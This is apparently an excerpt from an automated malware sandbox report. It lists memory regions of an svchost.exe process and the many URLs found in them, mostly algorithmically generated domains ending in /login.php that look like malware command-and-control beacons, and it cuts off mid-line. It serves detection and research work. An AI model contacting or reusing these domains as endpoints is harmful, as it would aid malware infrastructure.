Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352433999.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793845752.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797125735.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266499150.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyquc.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/http://gahyhys.com/http://gahyhys.com/http://qegyhev.com/http://purycul.com/http:
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/login.php0
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzek.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055822668.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybic.com/login.php
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybyf.com/Pm
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycim.com/0l
Source: svchost.exe, 00000002.00000003.2055722798.00000000066C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048160160.00000000066C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055773582.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydut.com/Revoked
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydut.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357632057.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360289865.000000000673E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364803259.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2151201367.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364340115.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzuf.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycom.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjuf.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykak.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148887592.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282876167.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346145517.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2144468325.000000000B5A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135966274.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyret.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462483307.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrik.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064129589.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602579791.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133387023.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycut.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyguf.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykuc.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460748465.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425878319.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400273849.000000000B57B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423753303.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454863582.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446339089.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymyk.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypek.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqoc.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrec.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrif.com/login.php
Source: svchost.exe, 00000002.00000003.2119703329.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1995198277.0000000002930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339528056.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055181884.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2125785660.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145862063.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045392452.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106127398.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2277427978.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282094346.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e
Source: svchost.exe, 00000002.00000003.2119703329.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055181884.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2125785660.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045392452.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106127398.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 